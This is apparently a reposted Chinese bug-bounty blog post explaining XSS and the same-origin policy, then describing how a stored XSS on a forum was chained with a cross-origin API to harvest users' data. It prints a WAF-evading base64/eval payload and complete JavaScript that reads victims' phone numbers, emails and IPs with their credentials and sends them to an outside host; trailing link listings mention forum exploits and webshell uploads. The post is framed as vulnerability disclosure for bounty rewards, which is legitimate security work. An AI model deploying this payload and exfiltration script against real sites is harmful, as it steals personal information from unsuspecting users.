发现某论坛一个漏洞!

转载 已于 2023-07-23 03:40:59 修改 · 237 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:https://mp.weixin.qq.com/s/80w7d7JGTSSQqnoN3KMg7g
文章标签:

#bug

于 2023-07-23 03:14:25 首次发布
文章介绍了如何通过结合跨站脚本攻击(XSS)和浏览器的同源策略,将通常被评为低危的反射型XSS漏洞升级为高危。作者详细解释了XSS攻击的原理,包括反射型和存储型两种类型,并阐述了同源策略在浏览器安全中的作用。通过实例展示了如何在发现存储型XSS和可跨域接口后,利用这两个漏洞组合来获取用户信息,从而提高漏洞的危害程度。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

SRC(安全应急响应中心,是企业用于对外接收来自用户发现并报告的产品安全漏洞的站点),白帽子可通过挖掘企业的安全漏洞,换取一定的奖励,如:现金、京东卡、周边礼物、节日礼盒等,目前国内已有近百家企业SRC平台,例如百度、阿里、腾讯、美团、滴滴等。

本次带来的是,OWASP TOP10 中最常见的安全漏洞:跨站脚本攻击(XSS),大多数SRC平台会把反射型XSS漏洞评为低危,所以这时候我们就需要思考,如何将低危漏洞升级为高危? 这里我们将利用XSS+浏览器同源策略,加大漏洞危害,提高漏洞评级。

先给大家简单介绍一下什么是跨站脚本攻击(XSS),这种攻击的原理是攻击者向有XSS漏洞的网站中输入恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。

图片

XSS攻击的核心是将可执行的前端脚本代码(一般为JavaScript)植入到网页中,听起来比较拗口,用大白话说就是攻击者想让你的浏览器执行他写的JS代码。那如何办到呢?一般XSS分为两种:

1、反射型:

图片

1、攻击者将JS代码作为请求参数放置URL中,诱导用户点击。示例:

http://localhost:8080/test?name=<script>alert("you are under attack!")</script>

2、用户点击后,该JS作为请求参数传给Web服务器后端

3、后端服务器没有检查过滤,简单处理后放入网页正文中返回给浏览器

4、浏览器解析返回的网页,中招!

2、存储型

图片

上述方式攻击脚本直接经服务器转手后返回浏览器触发执行,存储型与之的区别在于能够将攻击脚本入库存储,在后面进行查询时,再将攻击脚本渲染进网页,返回给浏览器触发执行。常见的套路举例如下:

1、攻击者网页回帖,帖子中包含JS脚本

2、回帖提交服务器后,存储至数据库

3、其他网友查看帖子,后台查询该帖子的回帖内容,构建完整网页,返回浏览器

4、该网友浏览器渲染返回的网页,中招!

说完了XSS攻击的原理,再给大家介绍一下什么是同源策略。

同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,它限制了网站前端能够访问的网络资源,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。

漏洞挖掘过程

漏洞目标:某SRC-论坛站点

漏洞发现方式

1、子域名找到一个链接,发现存在存储型xss。

2、在另一个子域名中,发现某个接口可以跨域,获取用户手机号、邮箱、访问ip等信息。

两个漏洞结合起来,在论坛中投放链接,可偷偷获取大量用户信息

漏洞详情

第一步:漏洞验证

第一个,存储型xss

https://act.zzzzzz.cn/index.php?mod=book&action=mobile&id=9

评论处存在存储型xss

图片

https://act.zzzzzzz.cn/index.php?mod=comment&action=add&sid=9&type=readat10&content=%E5%BE%88%E5%A5%BD<img+src=x+id=zzzzzzzzzjdW1lbnQuY3JlYXRlRWxlbWVudCgiczzzzzzzzzzzzzz0dHBzOi8veDAubnovanhrayzzzzW1lbnQuYm9kezzzzzzzzzzzzzzzzzzzChhKTs=+οnerrοr=eval(atob(this.id))

这里为了绕过WAF,采用了<img+src=x+id=YWxlcnQoMSkg+οnerrοr=eval(atob(this.id))>进行绕过

图片

第二个接口,跨域获取用户数据

https://bbs-act.zzzzzzz.cn/index.php?mod=index&action=win_list&limit=1&id=2

图片

两个漏洞结合,增加危害

1、在xss页面,写上代码,直接调用跨域接口

图片

第二步,在远端的js代码,调用接口,并把数据发送到远端

var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    //document.getElementById("demo").innerHTML = alert(this.responseText);
 var aa = JSON.parse(this.responseText);
 console.log(aa['data']['user']['phone']+','+aa['data']['user']['email']);
 var s=document.createElement('img');
 document.body.appendChild(s);
 s.src='//xxx.xxxxxx.cn?phone='+aa['data']['user']['phone']+'&email='+aa['data']['user']['email']+'&clientip='+aa['data']['user']['clientip'];
  }
};
xhttp.open("GET", "https://bbs-act.zzzzz.cn/index.php?mod=index&action=win_list&limit=20&id=2", true);
xhttp.withCredentials = true;
xhttp.send()

第三步 查看效果

当访问我们论坛上的地址时,就可以获取到对方的手机号、邮箱、IP地址等信息

图片

漏洞等级成功实现从低危升级为高危!

接下来就去提交漏洞,赚取奖励吧~

【XSS漏洞-01】XSS漏洞简介、危害与分类及验证
m0_64378913的博客
05-13 2万+
目录1 XSS漏洞简介2 XSS漏洞危害3 XSS漏洞分类3.1 反射型XSS3.2 存储型XSS3.3 DOM型XSS3.3.1 节点树模型3.3.2 DOM型XSS4 漏洞验证4.1 漏洞验证相关概念4.2 漏洞验证相关概念之间的区别4.3 常见POC5 XSS漏洞验证实例5.1 反射型XSS漏洞验证实例5.2 存储型XSS漏洞验证实例5.3 DOM型XSS漏洞验证实例6 总结参考文章 1 XSS漏洞简介 定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5591
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
Discuz开源论坛_v3.1系列_Sql注入漏洞详解
weixin_60708754的博客
05-12 1483
Discuz v3.1系列版本 Sql注入全流程详解
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 5958
Discuz v3.4系列 远程代码执行漏洞全流程详解
20分钟攻破DISCUZ论坛并盗取数据库(web安全白帽子)
吾名招财的博客
06-22 3156
1 快速搭建discuz论坛 2 使用kali下burpsuite对discuz后台注入PHP木马 3 使用cknife “菜刀” 上传webshell 木马到网站 4 使用webshell查看mysql数据库密码并盗取数据库
网站漏洞修复对DiscuzX3.4论坛总是被篡改页面
网站安全专家
04-26 2488
Discuz!论坛目前最新版本为3.4版本,已经好久没有更新了,我们SINE安全在对其网站安全检测的同时发现一处漏洞,该漏洞可导致论坛的后台文件可以任意的删除,导致网站瘫痪,后台无法登陆。关于该网站漏洞的细节我们来详细的分析看一下: Discuz漏洞的检测与分析 该漏洞发生的位置在于source目录下的admincp文件夹里的admincp_forums.php代码里,我们用note编辑器打开...
discuz X25 某功能存在 xss漏洞以及解决方案
09-28
discuz X25是一个基于PHP和MySQL的社区论坛程序,属于discuz!社区软件的一个版本。该软件用于搭建网站社区论坛,广泛应用于搭建个人、企业或组织的在线互动平台。 针对discuz X25的特定功能存在XSS漏洞漏洞的根本...
某src的支付漏洞挖掘(去年)
10-22
【某src的支付漏洞挖掘(去年)】是一个关于网络安全和支付系统漏洞的议题。这个话题主要探讨了在特定的在线支付平台(某src)上,存在一个可能导致用户利益受损的安全问题,具体表现为支付完成后,订单不会正常消失...
研究人员发现某加密货币纸钱包存在严重漏洞
01-07
造成这种现象最可能的原因是WalletGenerator把同样的私钥给了多个用户。作者:John Biggs 翻译:Maya MyCrypto网站安全研究院Harry Denleys发布了一篇关于纸钱包网站WalletGenerator.net的详细分析报告。 报告主要...
对某 DedeCMS 二开系统全局变量追加漏洞利用1
08-04
尽管如此,作者发现后台地址固定,且存在两个不同的管理后台:一个类似于原始DedeCMS的"admin@@",另一个是开发团队自定义的"adminxx"。经过测试,发现大部分站点的后台地址未变,这简化了寻找后台的步骤。 在无法...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
weixin_40966980的博客
01-03 2万+
这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922 验证码一直是 cccc 应该是每个ip第一次访问的话都是这个,所以可以用来爆破
开源论坛软件 NodeBB 中存在多个严重漏洞
smellycat000的专栏
12-07 570
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员指出,开源论坛平台 NodeBB 中存在多个严重漏洞,可导致攻击者窃取私密信息并访问管理员账户。NodeBB 是一款基于 Jav...
php漏洞论坛,PHPWIND1.3.6论坛漏洞分析
weixin_40005373的博客
03-20 576
PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点, DISCUZ 论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不论从功能还是安全 , 第一非DISCUZ 莫属。PHPWIN...
dz论坛Discuz_X3.4最新网站漏洞
网站安全专家
07-11 4万+
近期我们sinesafe安全部门审计discuz最新版的时候发现配置文件写入导致代码执行的问题。cms安装的时候一般会分为几个步骤去进行,其中有对配置文件config进行写入的步骤,当写入的时候未严格限制传入的参数就存在代码执行问题。源码信息:Discuz_X3.4_GIT_SC_UTF8问题文件: \upload\install\index.php漏洞类型:配置文件写入导致代码执行站点地址:ht...
XSS漏洞三大类型
一醉一休的博客
03-03 7338
(1)跨站脚本( Crbss - Site Script ),为了跟层叠样式表( Css )区分开来,简称 xss,它是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种 (2)产生原因: XSS的产生是由于 WEB应用程序对用户输入的过滤不足而产生的,攻击者利用该漏洞把恶意脚本注入到网页之中,当其他用户浏览网页时,就会执行其中的恶意代码。受害用户可能会被窃取cookie 、会话劫持,钓鱼等各种攻击 (3)XSS漏洞常出现的位置:各种留言板,搜索框,备注,反馈意见,评论处等等 (4)pikac
【软件测试】从软件测试到Bug评审:生命周期与管理技巧
卜及中的博客
07-20 716
本文详细介绍了软件测试中Bug的定义、管理、级别、生命周期;软件测试的生命周期各阶段的具体职责与工作;当测试人员与开发人员意见不一致时的做法等。
【测试开发】---Bug
最新发布
mr_yuanshen的博客
07-22 250
软件测试贯穿于软件开发的整个周期1.需求分析2.测试计划3.测试设计与开发4.测试执行5.测试评估6.上线7.运行维护bug的描述是很重要的,如果你只是指出开发人员的代码的一个bug,让他现在就改,他不得骂死你,所以你应该描述清清楚楚这个bug一个具体的bug应该包括版本,环境,重现步骤,预期结果,实际结果BUG的级别 为什么要对bug进行级别划分bug的生命周期前提:一定不能吵架3.我们可以将bug定义文档拿出来,有理有据的讲 4.如果是一位有能力的测试人员,可以给出自己的建议(注意态度一定要好,而不是命
【no vue no bug】 npm : 无法加载文件 D:\software\nodeJS\node22\npm.ps1
博文致力于人工智能算法的探索研究;前后端分离项目的技术分享交流;专升本计算机基础课程内容讲解;各种中间件技术分享
07-20 217
摘要 在VS Code中运行npm命令时出现脚本执行权限问题,提示"无法加载npm.ps1文件"。该问题是由于Windows系统的执行策略限制所致。解决方法是通过管理员权限运行PowerShell,执行Set-ExecutionPolicy RemoteSigned命令修改执行策略,允许运行本地脚本。此操作可解决VS Code中npm命令无法执行的问题,而系统控制台中的npm命令仍可正常使用。
一个针对某操作系统的漏洞检测方案
03-28
<think>好的,用户的问题是关于如何针对特定操作系统进行漏洞检测的方法和工具。我需要先理解用户的具体需求,他们可能是在寻找针对Windows或其他操作系统的漏洞检测方案,比如企业安全维护或者个人电脑的安全检查。 首先,我应该回顾系统漏洞检测的基本概念,确保自己理解正确。系统漏洞通常指操作系统或应用软件中的设计缺陷,可能被利用来攻击系统。用户提到的引用[1]和[2]中提到了Windows的漏洞检测工具,比如Sherlock和PrivescCheck,这些需要包含在回答中。 接下来,需要整理常见的漏洞检测方法。通常包括补丁比对、漏洞扫描工具、渗透测试、配置审查和日志分析等。补丁比对是基础,因为未安装的补丁往往是漏洞的来源。漏洞扫描工具如Nessus、OpenVAS适用于自动化扫描。渗透测试模拟攻击,发现潜在风险。配置审查确保系统设置符合安全标准,日志分析帮助发现异常行为。 然后,针对不同操作系统,比如Windows、Linux、macOS,需要列举对应的工具。例如,Windows有微软的Baseline Security Analyzer(虽然已停用,但替代方案如Defender和Azure工具),第三方工具如Nessus、Nexpose,以及脚本工具Sherlock和PrivescCheck。Linux方面,OpenVAS、Lynis、ClamAV等工具适用。macOS则可以用XProtect、MRT,以及第三方工具。 此外,用户可能想知道具体操作步骤,比如如何实施补丁比对或使用工具进行扫描。需要分步骤说明,确保清晰。同时,引用用户提供的参考资料,特别是关于Sherlock和PrivescCheck的部分,要正确标注引用标识。 还需要考虑用户可能的深层需求,比如他们是否需要免费工具、企业级解决方案,或者如何整合多种方法进行全面检测。因此,在回答中建议综合使用多种方法,并提到定期更新漏洞库和自动化的重要性。 最后,生成相关问题,帮助用户进一步探索,比如企业级工具的选择、Linux检测方案、渗透测试框架等。确保问题与主题相关,有引导性。 检查回答是否符合系统指令,特别是LaTeX格式是否正确,引用标识是否添加,结构是否清晰,分点说明,使用中文,避免使用Markdown,代码块用三个反引号包裹。确保没有提到任何内部思考过程,直接给出解决方案。</think>针对具体操作系统的漏洞检测方法和工具需结合系统特性与漏洞类型,以下分步骤说明: ### 一、漏洞检测方法 1. **补丁比对法** 通过比对操作系统已安装补丁与厂商发布的最新补丁清单,识别缺失的安全更新。例如,Windows系统可使用`wmic qfe list`命令查看已安装补丁[^2]。 2. **漏洞扫描工具** - **自动化扫描**:使用工具如$Nessus$、$OpenVAS$或$Nexpose$,通过特征库匹配已知漏洞(如CVE编号)。 - **脚本检测**:针对特定漏洞编写检测脚本,例如使用PowerShell脚本检测Windows提权漏洞[^1]。 3. **渗透测试框架** 利用$Metasploit$或$Cobalt Strike$模拟攻击行为,验证漏洞可利用性,例如测试SMB协议漏洞(如永恒之蓝)。 4. **配置审查** 检查系统安全策略,如账户权限、防火墙规则、服务开放端口等,避免配置不当引发的漏洞。 5. **日志分析** 分析系统日志(如Windows事件日志、Linux的`/var/log`)中的异常登录、权限变更等行为。 ### 二、操作系统专用工具 1. **Windows系统** - **微软官方工具**:已停用的$Microsoft Baseline Security Analyzer$(MBSA)可被$Windows Defender$和$Azure Security Center$替代[^1]。 - **第三方工具**: - $Nessus$:支持检测Windows补丁缺失、弱口令等问题。 - $Sherlock$:基于PowerShell的脚本,检测本地提权漏洞(如CVE-2018-8120)[^2]。 - $PrivescCheck$:自动化检查Windows配置错误(如服务权限漏洞)。 2. **Linux系统** - $OpenVAS$:扫描内核漏洞、软件包漏洞。 - $Lynis$:审计系统配置与合规性。 - $ClamAV$:检测恶意文件与后门程序。 3. **macOS系统** - 内置$XProtect$与$MRT$(Malware Removal Tool)检测恶意软件。 - 第三方工具$Jamf$或$osquery$实现漏洞管理与监控。 ### 三、操作建议 1. **综合使用工具**:例如先用$Nessus$扫描漏洞,再用$Metasploit$验证高风险漏洞。 2. **定期更新漏洞库**:确保工具特征库覆盖最新CVE条目。 3. **自动化集成**:将漏洞扫描嵌入CI/CD流程,例如使用$Jenkins$调用$OWASP ZAP$。 ```powershell # Windows系统使用Sherlock检测提权漏洞示例 Import-Module .\Sherlock.ps1 Find-AllVulns ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值